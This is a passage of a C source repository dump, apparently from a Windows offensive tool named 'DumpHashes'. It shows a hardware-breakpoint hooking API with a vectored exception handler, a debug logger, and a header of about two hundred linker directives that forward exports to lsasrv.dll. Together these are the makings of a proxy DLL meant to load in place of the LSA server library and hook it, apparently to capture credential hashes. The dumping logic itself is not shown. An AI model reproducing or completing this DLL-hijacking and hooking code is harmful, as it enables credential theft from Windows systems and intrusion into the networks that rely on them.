 76 | #define SETPARM_5(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x5))
 77 | #define SETPARM_6(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x6))
 78 | #define SETPARM_7(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x7))
 79 | #define SETPARM_8(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x8))
 80 | #define SETPARM_9(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0x9))
 81 | #define SETPARM_A(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0xA))
 82 | #define SETPARM_B(CTX, VALUE)(SetFunctionArgument(CTX, VALUE, 0xB))
 83 | 
 84 | 
 85 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
 86 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
 87 | 
 88 | 
 89 | // Initialize hardware breaking point library (populate global variables & set up the veh handler)
 90 | BOOL InitHardwareBreakpointHooking();
 91 | // Disable all the breaking points set and delete the veh handler
 92 | BOOL CleapUpHardwareBreakpointHooking();
 93 | 
 94 | 
 95 | // Install hook on a specified address														\
 96 | 	* Address			= Harware breaking point address (where to install)					\
 97 | 	* Drx				= Can be Dr0 -> Dr3													\
 98 | 	* CallbackRoutine	= Pointer to the detour function 									\
 99 | 	* ThreadId			= Thread identifier to hook	| 'ALL_THREADS' to hook all threads
100 | BOOL InstallHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DRX Drx, IN PVOID CallbackRoutine, IN DWORD ThreadId);
101 | 
102 | 
103 | 
104 | // Remove hook on a specified address														\
105 | 	* Address			= Harware breaking point address (where to unhook)					\
106 | 	* ThreadId			= Thread identifier to unhook | 'ALL_THREADS' to remove hook from all threads
107 | BOOL RemoveHardwareBreakingPntHook(IN PUINT_VAR_T Address, IN DWORD ThreadId);
108 | 
109 | 
110 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
111 | //---------------------------------------------------------------------------------------------------------------------------------------------------------
112 | #endif // !HARDWARE_BP
113 | 
114 | 
115 | 


--------------------------------------------------------------------------------
/DumpHashes/Log.c:
--------------------------------------------------------------------------------
 1 | #include <Windows.h>
 2 | #include <stdio.h>
 3 | 
 4 | #include "Log.h"
 5 | 
 6 | 
 7 | /*
 8 | @ Writes the debug log to a file.
 9 | */
10 | 
11 | VOID LogToFileW(IN LPCWSTR szFmt, ...) {
12 | 
13 |     WCHAR       szInputBuffer[0xFF] = { 0 };
14 |     PSTR        pArgs = NULL;
15 |     HANDLE      hFile = INVALID_HANDLE_VALUE;
16 |     DWORD       dwWrittenBytes = 0x00;
17 | 
18 |     va_start(pArgs, szFmt);
19 |     vswprintf_s(szInputBuffer, _countof(szInputBuffer), szFmt, pArgs);
20 |     va_end(pArgs);
21 | 
22 |     if ((hFile = CreateFileW(DEBUG_FILE, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE)
23 |     {
24 |         WriteFile(hFile, szInputBuffer, (DWORD)(wcslen(szInputBuffer) * sizeof(WCHAR)), &dwWrittenBytes, NULL);
25 |         CloseHandle(hFile);
26 |     }
27 |     else
28 |     {
29 |         OutputDebugStringW(szInputBuffer);
30 |     }
31 | 
32 | }


--------------------------------------------------------------------------------
/DumpHashes/Log.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | 
4 | #define DEBUG_FILE				    L"C:\\DummyDebug.log"
5 | #define DBGPRINTF(fmt, ...)			LogToFileW((fmt), __VA_ARGS__)
6 | 


--------------------------------------------------------------------------------
/DumpHashes/LsasrvExports.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | 
  4 | 
  5 | 
  6 | /*
  7 | @ lsasrv.dll's exports
  8 | */
  9 | 
 10 | #pragma comment(linker, "/export:InitializeLsaExtension=lsasrv.dll.InitializeLsaExtension,@40")
 11 | #pragma comment(linker, "/export:IsTraceLevelEnabled=lsasrv.dll.IsTraceLevelEnabled,@41")
 12 | #pragma comment(linker, "/export:LsaDbLookupSidChainRequest=lsasrv.dll.LsaDbLookupSidChainRequest,@53")
 13 | #pragma comment(linker, "/export:LsaIAddNamesToLogonSession=lsasrv.dll.LsaIAddNamesToLogonSession,@54")
 14 | #pragma comment(linker, "/export:LsaIAdjustTokenObjectIntegrity=lsasrv.dll.LsaIAdjustTokenObjectIntegrity,@55")
 15 | #pragma comment(linker, "/export:LsaIAdtAuditingEnabledByCategory=lsasrv.dll.LsaIAdtAuditingEnabledByCategory,@56")
 16 | #pragma comment(linker, "/export:LsaIAdtAuditingEnabledBySubCategory=lsasrv.dll.LsaIAdtAuditingEnabledBySubCategory,@57")
 17 | #pragma comment(linker, "/export:LsaIAllocateHeap=lsasrv.dll.LsaIAllocateHeap,@58")
 18 | #pragma comment(linker, "/export:LsaIAllocateHeapZero=lsasrv.dll.LsaIAllocateHeapZero,@59")
 19 | #pragma comment(linker, "/export:LsaIAllowProtectedCredLogon=lsasrv.dll.LsaIAllowProtectedCredLogon,@60")
 20 | #pragma comment(linker, "/export:LsaIAuditAccountLogon=lsasrv.dll.LsaIAuditAccountLogon,@61")
 21 | #pragma comment(linker, "/export:LsaIAuditAccountLogonEx=lsasrv.dll.LsaIAuditAccountLogonEx,@62")
 22 | #pragma comment(linker, "/export:LsaIAuditInitializeParametersAndWriteEvent=lsasrv.dll.LsaIAuditInitializeParametersAndWriteEvent,@63")
 23 | #pragma comment(linker, "/export:LsaIAuditKdcEvent=lsasrv.dll.LsaIAuditKdcEvent,@64")
 24 | #pragma comment(linker, "/export:LsaIAuditKerberosLogon=lsasrv.dll.LsaIAuditKerberosLogon,@65")
 25 | #pragma comment(linker, "/export:LsaIAuditLogonEx=lsasrv.dll.LsaIAuditLogonEx,@66")
 26 | #pragma comment(linker, "/export:LsaIAuditLogonUsingExplicitCreds=lsasrv.dll.LsaIAuditLogonUsingExplicitCreds,@67")
 27 | #pragma comment(linker, "/export:LsaIAuditNotifyPackageLoad=lsasrv.dll.LsaIAuditNotifyPackageLoad,@68")
 28 | #pragma comment(linker, "/export:LsaIAuditPasswordAccessEvent=lsasrv.dll.LsaIAuditPasswordAccessEvent,@69")
 29 | #pragma comment(linker, "/export:LsaIAuditReplay=lsasrv.dll.LsaIAuditReplay,@70")
 30 | #pragma comment(linker, "/export:LsaIAuditSamEvent=lsasrv.dll.LsaIAuditSamEvent,@71")
 31 | #pragma comment(linker, "/export:LsaICallPackage=lsasrv.dll.LsaICallPackage,@72")
 32 | #pragma comment(linker, "/export:LsaICallPackageEx=lsasrv.dll.LsaICallPackageEx,@73")
 33 | #pragma comment(linker, "/export:LsaICallPackagePassthrough=lsasrv.dll.LsaICallPackagePassthrough,@74")
 34 | #pragma comment(linker, "/export:LsaICancelNotification=lsasrv.dll.LsaICancelNotification,@75")
 35 | #pragma comment(linker, "/export:LsaIChangeSecretCipherKey=lsasrv.dll.LsaIChangeSecretCipherKey,@76")
 36 | #pragma comment(linker, "/export:LsaICheckProtectedUserByTokenInfo=lsasrv.dll.LsaICheckProtectedUserByTokenInfo,@77")
 37 | #pragma comment(linker, "/export:LsaICheckRestrictedMode=lsasrv.dll.LsaICheckRestrictedMode,@78")
 38 | #pragma comment(linker, "/export:LsaIClearOldSyskey=lsasrv.dll.LsaIClearOldSyskey,@79")
 39 | #pragma comment(linker, "/export:LsaIContextToHandleNoRef=lsasrv.dll.LsaIContextToHandleNoRef,@80")
 40 | #pragma comment(linker, "/export:LsaICopyToTokenInfoFromHandle=lsasrv.dll.LsaICopyToTokenInfoFromHandle,@81")
 41 | #pragma comment(linker, "/export:LsaICryptProtectData=lsasrv.dll.LsaICryptProtectData,@82")
 42 | #pragma comment(linker, "/export:LsaICryptProtectDataEx=lsasrv.dll.LsaICryptProtectDataEx,@83")
 43 | #pragma comment(linker, "/export:LsaICryptUnprotectData=lsasrv.dll.LsaICryptUnprotectData,@84")
 44 | #pragma comment(linker, "/export:LsaICryptUnprotectDataEx=lsasrv.dll.LsaICryptUnprotectDataEx,@85")
 45 | #pragma comment(linker, "/export:LsaIDereferenceCredHandle=lsasrv.dll.LsaIDereferenceCredHandle,@86")
 46 | #pragma comment(linker, "/export:LsaIDereferenceCtxtHandle=lsasrv.dll.LsaIDereferenceCtxtHandle,@87")
 47 | #pragma comment(linker, "/export:LsaIDeriveCredentialKey=lsasrv.dll.LsaIDeriveCredentialKey,@88")
 48 | #pragma comment(linker, "/export:LsaIDsNotifiedObjectChange=lsasrv.dll.LsaIDsNotifiedObjectChange,@89")
 49 | #pragma comment(linker, "/export:LsaIEfsAcceptSmartcardCredentials=lsasrv.dll.LsaIEfsAcceptSmartcardCredentials,@90")
 50 | #pragma comment(linker, "/export:LsaIEqualLogonProcessName=lsasrv.dll.LsaIEqualLogonProcessName,@91")
 51 | #pragma comment(linker, "/export:LsaIEqualSupplementalTokenInfo=lsasrv.dll.LsaIEqualSupplementalTokenInfo,@92")
 52 | #pragma comment(linker, "/export:LsaIEventWritePackageNoCredential=lsasrv.dll.LsaIEventWritePackageNoCredential,@93")
 53 | #pragma comment(linker, "/export:LsaIEventWritePackageNotCacheLogonUser=lsasrv.dll.LsaIEventWritePackageNotCacheLogonUser,@94")
 54 | #pragma comment(linker, "/export:LsaIExtractTargetInfo=lsasrv.dll.LsaIExtractTargetInfo,@95")
 55 | #pragma comment(linker, "/export:LsaIFilterInboundNamespace=lsasrv.dll.LsaIFilterInboundNamespace,@96")
 56 | #pragma comment(linker, "/export:LsaIFilterNamespace=lsasrv.dll.LsaIFilterNamespace,@97")
 57 | #pragma comment(linker, "/export:LsaIFilterSids=lsasrv.dll.LsaIFilterSids,@98")
 58 | #pragma comment(linker, "/export:LsaIFlushIdentityCacheForSid=lsasrv.dll.LsaIFlushIdentityCacheForSid,@99")
 59 | #pragma comment(linker, "/export:LsaIForestTrustFindMatch=lsasrv.dll.LsaIForestTrustFindMatch,@100")
 60 | #pragma comment(linker, "/export:LsaIFreeFilterInboundNamespaceResult=lsasrv.dll.LsaIFreeFilterInboundNamespaceResult,@101")
 61 | #pragma comment(linker, "/export:LsaIFreeForestTrustInfo=lsasrv.dll.LsaIFreeForestTrustInfo,@102")
 62 | #pragma comment(linker, "/export:LsaIFreeHeap=lsasrv.dll.LsaIFreeHeap,@103")
 63 | #pragma comment(linker, "/export:LsaIFreeReturnBuffer=lsasrv.dll.LsaIFreeReturnBuffer,@104")
 64 | #pragma comment(linker, "/export:LsaIFreeSupplementalTokenInfo=lsasrv.dll.LsaIFreeSupplementalTokenInfo,@105")
 65 | #pragma comment(linker, "/export:LsaIFree_LSAI_PRIVATE_DATA=lsasrv.dll.LsaIFree_LSAI_PRIVATE_DATA,@106")
 66 | #pragma comment(linker, "/export:LsaIFree_LSAI_SECRET_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAI_SECRET_ENUM_BUFFER,@107")
 67 | #pragma comment(linker, "/export:LsaIFree_LSAPR_ACCOUNT_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAPR_ACCOUNT_ENUM_BUFFER,@108")
 68 | #pragma comment(linker, "/export:LsaIFree_LSAPR_CR_CIPHER_VALUE=lsasrv.dll.LsaIFree_LSAPR_CR_CIPHER_VALUE,@109")
 69 | #pragma comment(linker, "/export:LsaIFree_LSAPR_POLICY_DOMAIN_INFORMATION=lsasrv.dll.LsaIFree_LSAPR_POLICY_DOMAIN_INFORMATION,@110")
 70 | #pragma comment(linker, "/export:LsaIFree_LSAPR_POLICY_INFORMATION=lsasrv.dll.LsaIFree_LSAPR_POLICY_INFORMATION,@111")
 71 | #pragma comment(linker, "/export:LsaIFree_LSAPR_PRIVILEGE_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAPR_PRIVILEGE_ENUM_BUFFER,@112")
 72 | #pragma comment(linker, "/export:LsaIFree_LSAPR_PRIVILEGE_SET=lsasrv.dll.LsaIFree_LSAPR_PRIVILEGE_SET,@113")
 73 | #pragma comment(linker, "/export:LsaIFree_LSAPR_REFERENCED_DOMAIN_LIST=lsasrv.dll.LsaIFree_LSAPR_REFERENCED_DOMAIN_LIST,@114")
 74 | #pragma comment(linker, "/export:LsaIFree_LSAPR_SR_SECURITY_DESCRIPTOR=lsasrv.dll.LsaIFree_LSAPR_SR_SECURITY_DESCRIPTOR,@115")
 75 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRANSLATED_NAMES=lsasrv.dll.LsaIFree_LSAPR_TRANSLATED_NAMES,@116")
 76 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRANSLATED_SIDS=lsasrv.dll.LsaIFree_LSAPR_TRANSLATED_SIDS,@117")
 77 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUSTED_DOMAIN_INFO=lsasrv.dll.LsaIFree_LSAPR_TRUSTED_DOMAIN_INFO,@118")
 78 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER=lsasrv.dll.LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER,@119")
 79 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER_EX=lsasrv.dll.LsaIFree_LSAPR_TRUSTED_ENUM_BUFFER_EX,@120")
 80 | #pragma comment(linker, "/export:LsaIFree_LSAPR_TRUST_INFORMATION=lsasrv.dll.LsaIFree_LSAPR_TRUST_INFORMATION,@121")
 81 | #pragma comment(linker, "/export:LsaIFree_LSAPR_UNICODE_STRING=lsasrv.dll.LsaIFree_LSAPR_UNICODE_STRING,@122")
 82 | #pragma comment(linker, "/export:LsaIFree_LSAPR_UNICODE_STRING_BUFFER=lsasrv.dll.LsaIFree_LSAPR_UNICODE_STRING_BUFFER,@123")
 83 | #pragma comment(linker, "/export:LsaIFree_LSAP_SITENAME_INFO=lsasrv.dll.LsaIFree_LSAP_SITENAME_INFO,@124")
 84 | #pragma comment(linker, "/export:LsaIFree_LSAP_SITE_INFO=lsasrv.dll.LsaIFree_LSAP_SITE_INFO,@125")
 85 | #pragma comment(linker, "/export:LsaIFree_LSAP_SUBNET_INFO=lsasrv.dll.LsaIFree_LSAP_SUBNET_INFO,@126")
 86 | #pragma comment(linker, "/export:LsaIFree_LSAP_UPN_SUFFIXES=lsasrv.dll.LsaIFree_LSAP_UPN_SUFFIXES,@127")
 87 | #pragma comment(linker, "/export:LsaIFree_LSA_FOREST_TRUST_COLLISION_INFORMATION=lsasrv.dll.LsaIFree_LSA_FOREST_TRUST_COLLISION_INFORMATION,@128")
 88 | #pragma comment(linker, "/export:LsaIFree_LSA_FOREST_TRUST_INFORMATION=lsasrv.dll.LsaIFree_LSA_FOREST_TRUST_INFORMATION,@129")
 89 | #pragma comment(linker, "/export:LsaIGetCallInfo=lsasrv.dll.LsaIGetCallInfo,@130")
 90 | #pragma comment(linker, "/export:LsaIGetCcgClient=lsasrv.dll.LsaIGetCcgClient,@131")
 91 | #pragma comment(linker, "/export:LsaIGetClientOsInfo=lsasrv.dll.LsaIGetClientOsInfo,@132")
 92 | #pragma comment(linker, "/export:LsaIGetForestTrustInformation=lsasrv.dll.LsaIGetForestTrustInformation,@133")
 93 | #pragma comment(linker, "/export:LsaIGetLogonGuid=lsasrv.dll.LsaIGetLogonGuid,@134")
 94 | #pragma comment(linker, "/export:LsaIGetNameFromLuid=lsasrv.dll.LsaIGetNameFromLuid,@135")
 95 | #pragma comment(linker, "/export:LsaIGetNbAndDnsDomainNames=lsasrv.dll.LsaIGetNbAndDnsDomainNames,@136")
 96 | #pragma comment(linker, "/export:LsaIGetNego2Package=lsasrv.dll.LsaIGetNego2Package,@137")
 97 | #pragma comment(linker, "/export:LsaIGetRemoteCredGuardLogonBuffer=lsasrv.dll.LsaIGetRemoteCredGuardLogonBuffer,@138")
 98 | #pragma comment(linker, "/export:LsaIGetRemoteCredGuardSupplementalCreds=lsasrv.dll.LsaIGetRemoteCredGuardSupplementalCreds,@139")
 99 | #pragma comment(linker, "/export:LsaIGetSiteName=lsasrv.dll.LsaIGetSiteName,@140")
100 | #pragma comment(linker, "/export:LsaIGetSupplementalTokenInfo=lsasrv.dll.LsaIGetSupplementalTokenInfo,@141")
101 | #pragma comment(linker, "/export:LsaIGetTokenInformationForLocalUser=lsasrv.dll.LsaIGetTokenInformationForLocalUser,@142")
102 | #pragma comment(linker, "/export:LsaIHealthCheck=lsasrv.dll.LsaIHealthCheck,@143")
103 | #pragma comment(linker, "/export:LsaIImpersonateClient=lsasrv.dll.LsaIImpersonateClient,@144")
104 | #pragma comment(linker, "/export:LsaIInitializeNetlogonFuncPtrs=lsasrv.dll.LsaIInitializeNetlogonFuncPtrs,@145")
105 | #pragma comment(linker, "/export:LsaIIsContainerized=lsasrv.dll.LsaIIsContainerized,@146")
106 | #pragma comment(linker, "/export:LsaIIsDomainWithinForest=lsasrv.dll.LsaIIsDomainWithinForest,@147")
107 | #pragma comment(linker, "/export:LsaIIsDsPaused=lsasrv.dll.LsaIIsDsPaused,@148")
108 | #pragma comment(linker, "/export:LsaIIsInEmulatedDomainJoinMode=lsasrv.dll.LsaIIsInEmulatedDomainJoinMode,@149")
109 | #pragma comment(linker, "/export:LsaIIsLastInteractiveLogonInfoEnabled=lsasrv.dll.LsaIIsLastInteractiveLogonInfoEnabled,@150")
110 | #pragma comment(linker, "/export:LsaIIsLocalHost=lsasrv.dll.LsaIIsLocalHost,@151")
111 | #pragma comment(linker, "/export:LsaIIsMachineSecureByDefault=lsasrv.dll.LsaIIsMachineSecureByDefault,@152")
112 | #pragma comment(linker, "/export:LsaIIsSuppressChannelBindingInfo=lsasrv.dll.LsaIIsSuppressChannelBindingInfo,@153")
113 | #pragma comment(linker, "/export:LsaIIsTargetPrivate=lsasrv.dll.LsaIIsTargetPrivate,@154")
114 | #pragma comment(linker, "/export:LsaIIsTrustedDomainsEnabled=lsasrv.dll.LsaIIsTrustedDomainsEnabled,@155")
115 | #pragma comment(linker, "/export:LsaIIsUserMSA=lsasrv.dll.LsaIIsUserMSA,@42")
116 | #pragma comment(linker, "/export:LsaIKerberosRegisterTrustNotification=lsasrv.dll.LsaIKerberosRegisterTrustNotification,@156")
117 | #pragma comment(linker, "/export:LsaILookupUserAccountType=lsasrv.dll.LsaILookupUserAccountType,@157")
118 | #pragma comment(linker, "/export:LsaILookupWellKnownName=lsasrv.dll.LsaILookupWellKnownName,@158")
119 | #pragma comment(linker, "/export:LsaIModifyPerformanceCounter=lsasrv.dll.LsaIModifyPerformanceCounter,@159")
120 | #pragma comment(linker, "/export:LsaINoConnectedUserPolicy=lsasrv.dll.LsaINoConnectedUserPolicy,@160")
121 | #pragma comment(linker, "/export:LsaINoMoreWin2KDomain=lsasrv.dll.LsaINoMoreWin2KDomain,@161")
122 | #pragma comment(linker, "/export:LsaINotifyChangeNotification=lsasrv.dll.LsaINotifyChangeNotification,@162")
123 | #pragma comment(linker, "/export:LsaINotifyGCStatusChange=lsasrv.dll.LsaINotifyGCStatusChange,@163")
124 | #pragma comment(linker, "/export:LsaINotifyNetlogonParametersChangeW=lsasrv.dll.LsaINotifyNetlogonParametersChangeW,@164")
125 | #pragma comment(linker, "/export:LsaINotifyNewPassword=lsasrv.dll.LsaINotifyNewPassword,@165")
126 | #pragma comment(linker, "/export:LsaINotifyPasswordChanged=lsasrv.dll.LsaINotifyPasswordChanged,@166")
127 | #pragma comment(linker, "/export:LsaIOpenPolicyTrusted=lsasrv.dll.LsaIOpenPolicyTrusted,@167")
128 | #pragma comment(linker, "/export:LsaIQueryForestTrustInfo=lsasrv.dll.LsaIQueryForestTrustInfo,@168")
129 | #pragma comment(linker, "/export:LsaIQueryForestTrustInformation=lsasrv.dll.LsaIQueryForestTrustInformation,@169")
130 | #pragma comment(linker, "/export:LsaIQueryInformationPolicyTrusted=lsasrv.dll.LsaIQueryInformationPolicyTrusted,@170")
131 | #pragma comment(linker, "/export:LsaIQueryPackageAttrInLogonSession=lsasrv.dll.LsaIQueryPackageAttrInLogonSession,@171")
132 | #pragma comment(linker, "/export:LsaIQuerySiteInfo=lsasrv.dll.LsaIQuerySiteInfo,@172")
133 | #pragma comment(linker, "/export:LsaIQuerySubnetInfo=lsasrv.dll.LsaIQuerySubnetInfo,@173")
134 | #pragma comment(linker, "/export:LsaIQueryUpnSuffixes=lsasrv.dll.LsaIQueryUpnSuffixes,@174")
135 | #pragma comment(linker, "/export:LsaIReferenceCredHandle=lsasrv.dll.LsaIReferenceCredHandle,@175")
136 | #pragma comment(linker, "/export:LsaIReferenceCtxtHandle=lsasrv.dll.LsaIReferenceCtxtHandle,@176")
137 | #pragma comment(linker, "/export:LsaIRegisterLogonSessionCallback=lsasrv.dll.LsaIRegisterLogonSessionCallback,@177")
138 | #pragma comment(linker, "/export:LsaIRegisterNotification=lsasrv.dll.LsaIRegisterNotification,@178")
139 | #pragma comment(linker, "/export:LsaIRegisterPolicyChangeNotificationCallback=lsasrv.dll.LsaIRegisterPolicyChangeNotificationCallback,@179")
140 | #pragma comment(linker, "/export:LsaIRenewCertificate=lsasrv.dll.LsaIRenewCertificate,@43")
141 | #pragma comment(linker, "/export:LsaIReplicateClientObject=lsasrv.dll.LsaIReplicateClientObject,@180")
142 | #pragma comment(linker, "/export:LsaIRetrieveCurrentUserSid=lsasrv.dll.LsaIRetrieveCurrentUserSid,@181")
143 | #pragma comment(linker, "/export:LsaISafeMode=lsasrv.dll.LsaISafeMode,@182")
144 | #pragma comment(linker, "/export:LsaISamIndicatedDsStarted=lsasrv.dll.LsaISamIndicatedDsStarted,@183")
145 | #pragma comment(linker, "/export:LsaISanitizeSAMName=lsasrv.dll.LsaISanitizeSAMName,@184")
146 | #pragma comment(linker, "/export:LsaISetClientDnsHostName=lsasrv.dll.LsaISetClientDnsHostName,@185")
147 | #pragma comment(linker, "/export:LsaISetLogonGuidInLogonSession=lsasrv.dll.LsaISetLogonGuidInLogonSession,@186")
148 | #pragma comment(linker, "/export:LsaISetLogonInfo=lsasrv.dll.LsaISetLogonInfo,@187")
149 | #pragma comment(linker, "/export:LsaISetNewSyskey=lsasrv.dll.LsaISetNewSyskey,@188")
150 | #pragma comment(linker, "/export:LsaISetPackageAttrInLogonSession=lsasrv.dll.LsaISetPackageAttrInLogonSession,@189")
151 | #pragma comment(linker, "/export:LsaISetSupplementalTokenInfo=lsasrv.dll.LsaISetSupplementalTokenInfo,@190")
152 | #pragma comment(linker, "/export:LsaISetTokenDacl=lsasrv.dll.LsaISetTokenDacl,@191")
153 | #pragma comment(linker, "/export:LsaISetUserFlags=lsasrv.dll.LsaISetUserFlags,@192")
154 | #pragma comment(linker, "/export:LsaITransformAuthorizationData=lsasrv.dll.LsaITransformAuthorizationData,@193")
155 | #pragma comment(linker, "/export:LsaIUnregisterAllPolicyChangeNotificationCallback=lsasrv.dll.LsaIUnregisterAllPolicyChangeNotificationCallback,@194")
156 | #pragma comment(linker, "/export:LsaIUnregisterLogonSessionCallback=lsasrv.dll.LsaIUnregisterLogonSessionCallback,@195")
157 | #pragma comment(linker, "/export:LsaIUnregisterPolicyChangeNotificationCallback=lsasrv.dll.LsaIUnregisterPolicyChangeNotificationCallback,@196")
158 | #pragma comment(linker, "/export:LsaIUpdateForestTrustInformation=lsasrv.dll.LsaIUpdateForestTrustInformation,@197")
159 | #pragma comment(linker, "/export:LsaIUpdateKerbMaxTokenSize=lsasrv.dll.LsaIUpdateKerbMaxTokenSize,@198")
160 | #pragma comment(linker, "/export:LsaIUpdateLogonSession=lsasrv.dll.LsaIUpdateLogonSession,@199")
161 | #pragma comment(linker, "/export:LsaIValidateTargetInfo=lsasrv.dll.LsaIValidateTargetInfo,@200")
162 | #pragma comment(linker, "/export:LsaIVerifyCachability=lsasrv.dll.LsaIVerifyCachability,@201")
163 | #pragma comment(linker, "/export:LsaIVerifyCachabilityEx=lsasrv.dll.LsaIVerifyCachabilityEx,@202")
164 | #pragma comment(linker, "/export:LsaIWasLogonNotifiedOfProfileLoad=lsasrv.dll.LsaIWasLogonNotifiedOfProfileLoad,@203")
165 | #pragma comment(linker, "/export:LsaIWriteAuditEvent=lsasrv.dll.LsaIWriteAuditEvent,@204")
166 | #pragma comment(linker, "/export:LsaIWriteKdcAuthenticationEvent=lsasrv.dll.LsaIWriteKdcAuthenticationEvent,@205")
167 | #pragma comment(linker, "/export:LsaLookupPerfCounterAddAmount=lsasrv.dll.LsaLookupPerfCounterAddAmount,@44")
168 | #pragma comment(linker, "/export:LsaLookupPerfCounterAddLargeAmount=lsasrv.dll.LsaLookupPerfCounterAddLargeAmount,@45")
169 | #pragma comment(linker, "/export:LsaLookupPerfCounterDecrementCount=lsasrv.dll.LsaLookupPerfCounterDecrementCount,@46")
170 | #pragma comment(linker, "/export:LsaLookupPerfCounterDecrementLargeCount=lsasrv.dll.LsaLookupPerfCounterDecrementLargeCount,@47")
171 | #pragma comment(linker, "/export:LsaLookupPerfCounterIncrementCount=lsasrv.dll.LsaLookupPerfCounterIncrementCount,@48")
172 | #pragma comment(linker, "/export:LsaLookupPerfCounterIncrementLargeCount=lsasrv.dll.LsaLookupPerfCounterIncrementLargeCount,@49")
173 | #pragma comment(linker, "/export:LsapAdtGetCallerProcessInfo=lsasrv.dll.LsapAdtGetCallerProcessInfo,@206")
174 | #pragma comment(linker, "/export:LsapAdtWriteLog=lsasrv.dll.LsapAdtWriteLog,@207")
175 | #pragma comment(linker, "/export:LsapAllocateLsaHeap=lsasrv.dll.LsapAllocateLsaHeap,@208")
176 | #pragma comment(linker, "/export:LsapAllocatePrivateHeap=lsasrv.dll.LsapAllocatePrivateHeap,@209")
177 | #pragma comment(linker, "/export:LsapAuOpenSam=lsasrv.dll.LsapAuOpenSam,@210")
178 | #pragma comment(linker, "/export:LsapAuditFailed=lsasrv.dll.LsapAuditFailed,@211")
179 | #pragma comment(linker, "/export:LsapBuildPrivilegeAuditString=lsasrv.dll.LsapBuildPrivilegeAuditString,@212")
180 | #pragma comment(linker, "/export:LsapCheckBootMode=lsasrv.dll.LsapCheckBootMode,@213")
181 | #pragma comment(linker, "/export:LsapCloseHandle=lsasrv.dll.LsapCloseHandle,@214")
182 | #pragma comment(linker, "/export:LsapCompareDomainNames=lsasrv.dll.LsapCompareDomainNames,@215")
183 | #pragma comment(linker, "/export:LsapCrServerGetSessionKey=lsasrv.dll.LsapCrServerGetSessionKey,@216")
184 | #pragma comment(linker, "/export:LsapCrServerGetSessionKeySafe=lsasrv.dll.LsapCrServerGetSessionKeySafe,@217")
185 | #pragma comment(linker, "/export:LsapDbAcquireLockEx=lsasrv.dll.LsapDbAcquireLockEx,@218")
186 | #pragma comment(linker, "/export:LsapDbApplyTransaction=lsasrv.dll.LsapDbApplyTransaction,@219")
187 | #pragma comment(linker, "/export:LsapDbBuildObjectCaches=lsasrv.dll.LsapDbBuildObjectCaches,@220")
188 | #pragma comment(linker, "/export:LsapDbCloseHandle=lsasrv.dll.LsapDbCloseHandle,@221")
189 | #pragma comment(linker, "/export:LsapDbCloseObject=lsasrv.dll.LsapDbCloseObject,@222")
190 | #pragma comment(linker, "/export:LsapDbCopyUnicodeAttribute=lsasrv.dll.LsapDbCopyUnicodeAttribute,@223")
191 | #pragma comment(linker, "/export:LsapDbCopyUnicodeAttributeNoAlloc=lsasrv.dll.LsapDbCopyUnicodeAttributeNoAlloc,@224")
192 | #pragma comment(linker, "/export:LsapDbCreateObject=lsasrv.dll.LsapDbCreateObject,@225")
193 | #pragma comment(linker, "/export:LsapDbDeleteAttributesObject=lsasrv.dll.LsapDbDeleteAttributesObject,@226")
194 | #pragma comment(linker, "/export:LsapDbDeleteObject=lsasrv.dll.LsapDbDeleteObject,@227")
195 | #pragma comment(linker, "/export:LsapDbDereferenceHandle=lsasrv.dll.LsapDbDereferenceHandle,@228")
196 | #pragma comment(linker, "/export:LsapDbDereferenceObject=lsasrv.dll.LsapDbDereferenceObject,@229")
197 | #pragma comment(linker, "/export:LsapDbEnumerateSids=lsasrv.dll.LsapDbEnumerateSids,@230")
198 | #pragma comment(linker, "/export:LsapDbEnumerateTrustedDomainsEx=lsasrv.dll.LsapDbEnumerateTrustedDomainsEx,@231")
199 | #pragma comment(linker, "/export:LsapDbExpAcquireReadLockTrustedDomainList=lsasrv.dll.LsapDbExpAcquireReadLockTrustedDomainList,@232")
200 | #pragma comment(linker, "/export:LsapDbExpAcquireWriteLockTrustedDomainList=lsasrv.dll.LsapDbExpAcquireWriteLockTrustedDomainList,@233")
201 | #pragma comment(linker, "/export:LsapDbExpConvertReadLockTrustedDomainListToExclusive=lsasrv.dll.LsapDbExpConvertReadLockTrustedDomainListToExclusive,@234")
202 | #pragma comment(linker, "/export:LsapDbExpConvertWriteLockTrustedDomainListToShared=lsasrv.dll.LsapDbExpConvertWriteLockTrustedDomainListToShared,@235")
203 | #pragma comment(linker, "/export:LsapDbExpIsCacheBuilding=lsasrv.dll.LsapDbExpIsCacheBuilding,@236")
204 | #pragma comment(linker, "/export:LsapDbExpIsCacheValid=lsasrv.dll.LsapDbExpIsCacheValid,@237")
205 | #pragma comment(linker, "/export:LsapDbExpIsLockedTrustedDomainList=lsasrv.dll.LsapDbExpIsLockedTrustedDomainList,@238")
206 | #pragma comment(linker, "/export:LsapDbExpMakeCacheBuilding=lsasrv.dll.LsapDbExpMakeCacheBuilding,@239")
207 | #pragma comment(linker, "/export:LsapDbExpMakeCacheInvalid=lsasrv.dll.LsapDbExpMakeCacheInvalid,@240")
208 | #pragma comment(linker, "/export:LsapDbExpMakeCacheValid=lsasrv.dll.LsapDbExpMakeCacheValid,@241")
209 | #pragma comment(linker, "/export:LsapDbExpReleaseLockTrustedDomainList=lsasrv.dll.LsapDbExpReleaseLockTrustedDomainList,@242")
